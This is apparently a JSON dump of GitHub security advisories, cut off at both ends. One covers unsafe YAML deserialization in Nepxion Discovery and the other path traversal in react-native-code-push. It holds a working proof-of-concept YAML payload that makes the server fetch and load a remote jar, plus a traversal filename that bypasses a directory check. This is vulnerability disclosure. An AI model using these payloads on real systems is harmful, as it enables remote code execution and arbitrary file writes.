[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L108-L108)\r\n <pre><code class=\"java\">\r\n @Override\r\n public String createVersionRelease(String group, String serviceId, <strong>String conditionStrategyYaml</strong>) {\r\n ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(conditionStrategyYaml);\r\n \r\n </code></pre>\r\n \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L109-L109)\r\n <pre><code class=\"java\"> @Override\r\n public String createVersionRelease(String group, String serviceId, String conditionStrategyYaml) {\r\n ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(<strong>conditionStrategyYaml</strong>);\r\n \r\n return createVersionRelease(group, serviceId, conditionStrategy);\r\n </code></pre>\r\n \r\n7. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L197-L197)\r\n <pre><code class=\"java\">\r\n @Override\r\n public ConditionStrategy deparseVersionReleaseYaml(<strong>String conditionStrategyYaml</strong>) {\r\n return YamlUtil.fromYaml(conditionStrategyYaml, ConditionStrategy.class);\r\n }\r\n </code></pre>\r\n \r\n8. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L198-L198)\r\n <pre><code class=\"java\"> @Override\r\n public ConditionStrategy deparseVersionReleaseYaml(String conditionStrategyYaml) {\r\n return YamlUtil.fromYaml(<strong>conditionStrategyYaml</strong>, ConditionStrategy.class);\r\n }\r\n \r\n </code></pre>\r\n \r\n9. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n <pre><code class=\"java\"> }\r\n \r\n public static <T> T fromYaml(<strong>String yaml</strong>, Class<T> clazz) {\r\n // 非线程安全\r\n Yaml snakeYaml = new Yaml();\r\n </code></pre>\r\n \r\n10. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n <pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n \r\n return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n }\r\n }</code></pre>\r\n \r\n\r\n</details>\r\n\r\n----------------------------------------\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n\r\n return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L62-L62).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 10 steps</summary>\r\n\r\n1. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L62-L62)\r\n <pre><code class=\"java\"> @ApiOperation(value = \"全局订阅方式,根据Yaml格式,重新创建版本蓝绿灰度发布(创建链路智能编排,不创建条件表达式)\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n @ResponseBody\r\n public ResponseEntity<?> recreateVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, <strong>@RequestBody @ApiParam(value = \"蓝绿灰度路由策略Yaml\", required = true) String conditionRouteStrategyYaml</strong>) {\r\n return doRecreateVersionRelease(group, conditionRouteStrategyYaml);\r\n }\r\n </code></pre>\r\n \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L63-L63)\r\n <pre><code class=\"java\"> @ResponseBody\r\n public ResponseEntity<?> recreateVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @RequestBody @ApiParam(value = \"蓝绿灰度路由策略Yaml\", required = true) String conditionRouteStrategyYaml) {\r\n return doRecreateVersionRelease(group, <strong>conditionRouteStrategyYaml</strong>);\r\n }\r\n \r\n </code></pre>\r\n \r\n3. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L201-L201)\r\n <pre><code class=\"java\"> }\r\n \r\n private ResponseEntity<?> doRecreateVersionRelease(String group, <strong>String conditionRouteStrategyYaml</strong>) {\r\n try {\r\n String result = strategyResource.recreateVersionRelease(group, conditionRouteStrategyYaml);\r\n </code></pre>\r\n \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L203-L203)\r\n <pre><code class=\"java\"> private ResponseEntity<?> doRecreateVersionRelease(String group, String conditionRouteStrategyYaml) {\r\n try {\r\n String result = strategyResource.recreateVersionRelease(group, <strong>conditionRouteStrategyYaml</strong>);\r\n \r\n return ResponseUtil.getSuccessResponse(result);\r\n </code></pre>\r\n \r\n5. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L81-L81)\r\n <pre><code class=\"java\">\r\n @Override\r\n public String recreateVersionRelease(String group, <strong>String conditionRouteStrategyYaml</strong>) {\r\n return recreateVersionRelease(group, null, conditionRouteStrategyYaml);\r\n }\r\n </code></pre>\r\n \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L82-L82)\r\n <pre><code class=\"java\"> @Override\r\n public String recreateVersionRelease(String group, String conditionRouteStrategyYaml) {\r\n return recreateVersionRelease(group, null, <strong>conditionRouteStrategyYaml</strong>);\r\n }\r\n \r\n </code></pre>\r\n \r\n7. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L126-L126)\r\n <pre><code class=\"java\">\r\n @Override\r\n public String recreateVersionRelease(String group, String serviceId, <strong>String conditionRouteStrategyYaml</strong>) {\r\n ConditionRouteStrategy conditionRouteStrategy = YamlUtil.fromYaml(conditionRouteStrategyYaml, ConditionRouteStrategy.class);\r\n \r\n </code></pre>\r\n \r\n8. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L127-L127)\r\n <pre><code class=\"java\"> @Override\r\n public String recreateVersionRelease(String group, String serviceId, String conditionRouteStrategyYaml) {\r\n ConditionRouteStrategy conditionRouteStrategy = YamlUtil.fromYaml(<strong>conditionRouteStrategyYaml</strong>, ConditionRouteStrategy.class);\r\n \r\n return recreateVersionRelease(group, serviceId, conditionRouteStrategy);\r\n </code></pre>\r\n \r\n9. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n <pre><code class=\"java\"> }\r\n \r\n public static <T> T fromYaml(<strong>String yaml</strong>, Class<T> clazz) {\r\n // 非线程安全\r\n Yaml snakeYaml = new Yaml();\r\n </code></pre>\r\n \r\n10. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n <pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n \r\n return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n }\r\n }</code></pre>\r\n \r\n\r\n</details>\r\n\r\n----------------------------------------\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n\r\n return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L48-L48).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 10 steps</summary>\r\n\r\n1. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L48-L48)\r\n <pre><code class=\"java\"> @ApiOperation(value = \"全局订阅方式,根据Yaml格式,创建版本蓝绿灰度发布\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n @ResponseBody\r\n public ResponseEntity<?> createVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, <strong>@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml</strong>) {\r\n return doCreateVersionRelease(group, conditionStrategyYaml);\r\n }\r\n </code></pre>\r\n \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L49-L49)\r\n <pre><code class=\"java\"> @ResponseBody\r\n public ResponseEntity<?> createVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml) {\r\n return doCreateVersionRelease(group, <strong>conditionStrategyYaml</strong>);\r\n }\r\n \r\n </code></pre>\r\n \r\n3. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L181-L181)\r\n <pre><code class=\"java\"> }\r\n \r\n private ResponseEntity<?> doCreateVersionRelease(String group, <strong>String conditionStrategyYaml</strong>) {\r\n try {\r\n String result = strategyResource.createVersionRelease(group, conditionStrategyYaml);\r\n </code></pre>\r\n \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L183-L183)\r\n <pre><code class=\"java\"> private ResponseEntity<?> doCreateVersionRelease(String group, String conditionStrategyYaml) {\r\n try {\r\n String result = strategyResource.createVersionRelease(group, <strong>conditionStrategyYaml</strong>);\r\n \r\n return ResponseUtil.getSuccessResponse(result);\r\n </code></pre>\r\n \r\n5. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L69-L69)\r\n <pre><code class=\"java\">\r\n @Override\r\n public String createVersionRelease(String group, <strong>String conditionStrategyYaml</strong>) {\r\n ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(conditionStrategyYaml);\r\n \r\n </code></pre>\r\n \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L70-L70)\r\n <pre><code class=\"java\"> @Override\r\n public String createVersionRelease(String group, String conditionStrategyYaml) {\r\n ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(<strong>conditionStrategyYaml</strong>);\r\n \r\n return createVersionRelease(group, conditionStrategy);\r\n </code></pre>\r\n \r\n7. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L197-L197)\r\n <pre><code class=\"java\">\r\n @Override\r\n public ConditionStrategy deparseVersionReleaseYaml(<strong>String conditionStrategyYaml</strong>) {\r\n return YamlUtil.fromYaml(conditionStrategyYaml, ConditionStrategy.class);\r\n }\r\n </code></pre>\r\n \r\n8. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L198-L198)\r\n <pre><code class=\"java\"> @Override\r\n public ConditionStrategy deparseVersionReleaseYaml(String conditionStrategyYaml) {\r\n return YamlUtil.fromYaml(<strong>conditionStrategyYaml</strong>, ConditionStrategy.class);\r\n }\r\n \r\n </code></pre>\r\n \r\n9. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n <pre><code class=\"java\"> }\r\n \r\n public static <T> T fromYaml(<strong>String yaml</strong>, Class<T> clazz) {\r\n // 非线程安全\r\n Yaml snakeYaml = new Yaml();\r\n </code></pre>\r\n \r\n10. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n <pre><code class=\"java\"> Yaml snakeYaml = new Yaml();\r\n \r\n return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n }\r\n }</code></pre>\r\n \r\n\r\n</details>\r\n\r\n#### Proof of Concept\r\n\r\nSend the following payload to `http://127.0.0.1:9628/strategy/deparse-version-release-yaml`.\r\n\r\n```yaml\r\n!!com.nepxion.discovery.common.entity.ConditionStrategy:\r\n service: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:8080/yaml-payload.jar\"]]]]\r\n blueGreen:\r\n gray:\r\n header:\r\n sort:\r\n```\r\n\r\nThis will cause discovery to download the jar hosted at `http://localhost:8080` (generated using [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload)) and attempt to service load an instance of the `javax.script.ScriptEngineFactory`.\r\n\r\n----------------------------------------\r\n\r\n### Patches\r\n_Has the problem been patched? What versions should users upgrade to?_\r\n\r\n### Workarounds\r\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\r\n\r\n### References\r\n - https://github.com/mbechler/marshalsec/tree/master", "severity": "critical", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-22cq-8f5q-p5g2", "type": "GHSA" }, { "value": "CVE-2022-1471", "type": "CVE" } ], "state": "published", "created_at": "2022-12-12T18:16:25Z", "updated_at": "2023-02-02T19:48:29Z", "published_at": "2023-02-02T19:48:29Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "com.nepxion:discovery-common" }, "vulnerable_version_range": "< 6.20.0", "patched_versions": "6.20.0", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "score": 10.0 }, "cwes": [ { "cwe_id": "CWE-20", "name": "Improper Input Validation" }, { "cwe_id": "CWE-77", "name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')" }, { "cwe_id": "CWE-502", "name": "Deserialization of Untrusted Data" } ], "cwe_ids": [ "CWE-20", "CWE-77", "CWE-502" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" }, { "login": "jorgectf", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" }, { "user": { "login": "jorgectf", "id": 46056498, "node_id": "MDQ6VXNlcjQ2MDU2NDk4", "avatar_url": "https://avatars.githubusercontent.com/u/46056498?v=4", "gravatar_id": "", "url": "https://api.github.com/users/jorgectf", "html_url": "https://github.com/jorgectf", "followers_url": "https://api.github.com/users/jorgectf/followers", "following_url": "https://api.github.com/users/jorgectf/following{/other_user}", "gists_url": "https://api.github.com/users/jorgectf/gists{/gist_id}", "starred_url": "https://api.github.com/users/jorgectf/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/jorgectf/subscriptions", "organizations_url": "https://api.github.com/users/jorgectf/orgs", "repos_url": "https://api.github.com/users/jorgectf/repos", "events_url": "https://api.github.com/users/jorgectf/events{/privacy}", "received_events_url": "https://api.github.com/users/jorgectf/received_events", "type": "User", "site_admin": true }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-7hfp-mpq6-2jhf", "cve_id": null, "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-7hfp-mpq6-2jhf", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-7hfp-mpq6-2jhf", "summary": "Improper Limitation of a Pathname to a Restricted Directory ('Partial-Path Traversal') during unzip in react-native-code-push", "description": "### Impact\r\n\r\nPartial-path traversal vulnerability allows zip files downloaded as a part of the `com.microsoft.codepush.react.CodePushNativeModule#downloadUpdate` to write their contents out of the intended desintination directory `/unzipped`.\r\n\r\nThis bug can lead to two potential issues:\r\n - Arbitrarily written files to sibling directories of the `/unzipped` directories like `/unzipped-private`\r\n - DOS of the host system by filling the disk space of the drive as these files written outside the `/unzipped` directories will never be cleaned up.\r\n\r\nThe `downloadUpdate` method, although written in Java, is exposed as a react-native method, and is invoked from Javascript code.\r\n\r\n#### Vulnerability Root Cause\r\n\r\nThe `com.microsoft.codepush.react.FileUtils#unzipFile` contains a partial-path traversal vulnerability in the logic used to unzip a zip file. This is due to the `com.microsoft.codepush.react.FileUtils#validateFileName` method containing an insufficient guard against partial-path traversal vulnerabilities.\r\n\r\n ```java\r\n private static String validateFileName(String fileName, File destinationFolder) throws IOException {\r\n String destinationFolderCanonicalPath = destinationFolder.getCanonicalPath();\r\n\r\n File file = new File(destinationFolderCanonicalPath, fileName);\r\n String canonicalPath = file.getCanonicalPath();\r\n\r\n if (!canonicalPath.startsWith(destinationFolderCanonicalPath)) {\r\n throw new IllegalStateException(\"File is outside extraction target directory.\");\r\n }\r\n\r\n return canonicalPath;\r\n }\r\n ```\r\n\\- https://github.com/microsoft/react-native-code-push/blob/f72751fbc044e8348bda82c52b784d29952e06dd/android/app/src/main/java/com/microsoft/codepush/react/FileUtils.java#L126-L137\r\n\r\nThe application controls the `destinationFolder` argument, which will always be a directory ending in `/unzipped`, but the `fileName` comes from the untrusted Zip file. The above bit of logic can be bypassed with the following payloads:\r\n\r\n```java\r\n// The following will return the string \"[SOME PARENT PATH]/unzipped-private/foo-bar\"\r\nvalidateFileName(\"/../unzipped-private/foo-bar\", new File(\"[SOME PARENT PATH]/unzipped\"))\r\n```\r\n\r\n#### True Root cause\r\n\r\n> If the result of `parent.getCanonicalPath()` is not slash terminated it allows for partial path traversal.\r\n>\r\n> Consider `\"/usr/outnot\".startsWith(\"/usr/out\")`. The check is bypassed although `outnot` is not under the `out` directory.\r\nThe terminating slash may be removed in various places. On Linux `println(new File(\"/var/\"))` returns `/var`, but `println(new File(\"/var\", \"/\"))` - `/var/`, however `println(new File(\"/var\", \"/\").getCanonicalPath())` - `/var`.\r\n> \\- [@JarLob (Jaroslav Lobačevski)](https://github.com/JarLob)\r\n\r\n### Patches\r\n\r\nNone\r\n\r\n### Workarounds\r\n\r\nNone\r\n\r\n### References\r\n\r\nSimilar vulnerabilities:\r\n - ESAPI (The OWASP Enterprise Security API) - https://nvd.nist.gov/vuln/detail/CVE-2022-23457\r\n\r\n### Response from Microsoft\r\n\r\n> VULN-066991 CRM:0765000224\r\n>\r\n> Hello,\r\n>\r\n> Thank you for contacting the Microsoft Security Response Center (MSRC). We appreciate the time taken to submit this assessment.\r\n> \r\n> Upon investigation, we have determined that this submission does not meet the definition of a security vulnerability for servicing. This report does not appear to identify a weakness in a Microsoft product or service that would enable an attacker to compromise the integrity, availability, or confidentiality of a Microsoft offering. \r\n> \r\n> As such, this thread is being closed and no longer monitored. We apologize for any inconvenience this may have caused.\r\n> \r\n> If you believe this determination to be in error, submit a new report at https://aka.ms/secure-at\r\n> \r\n> Please include:\r\n> \r\n> Relevant information previously provided in your initial report\r\n> Detailed steps required to consistently reproduce the issue\r\n> Short explanation on how an attacker could use the information to exploit another user remotely\r\n> Proof-of-concept (POC), such as a video recording, crash reports, screenshots, or relevant code samples\r\n> \r\n> More information on reporting a security vulnerability can be found at [https://www.microsoft.com/msrc/faqs-report-an-issue](https://www.microsoft.com/en-us/msrc/faqs-report-an-issue?rtc=1).\r\n> \r\n> Regards,\r\n> \r\n> Ali \r\n> MSRC\r\n", "severity": "high", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-7hfp-mpq6-2jhf", "type": "GHSA" } ], "state": "published", "created_at": "2022-05-13T16:50:01Z", "updated_at": "2022-05-16T21:45:15Z", "published_at": "2022-05-16T21:45:15Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "npm", "name": "react-native-code-push" }, "vulnerable_version_range": "<=v7.0.4", "patched_versions": "", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "score": 8.1 }, "cwes": [ { "cwe_id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" } ], "cwe_ids": [ "CWE-22" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": 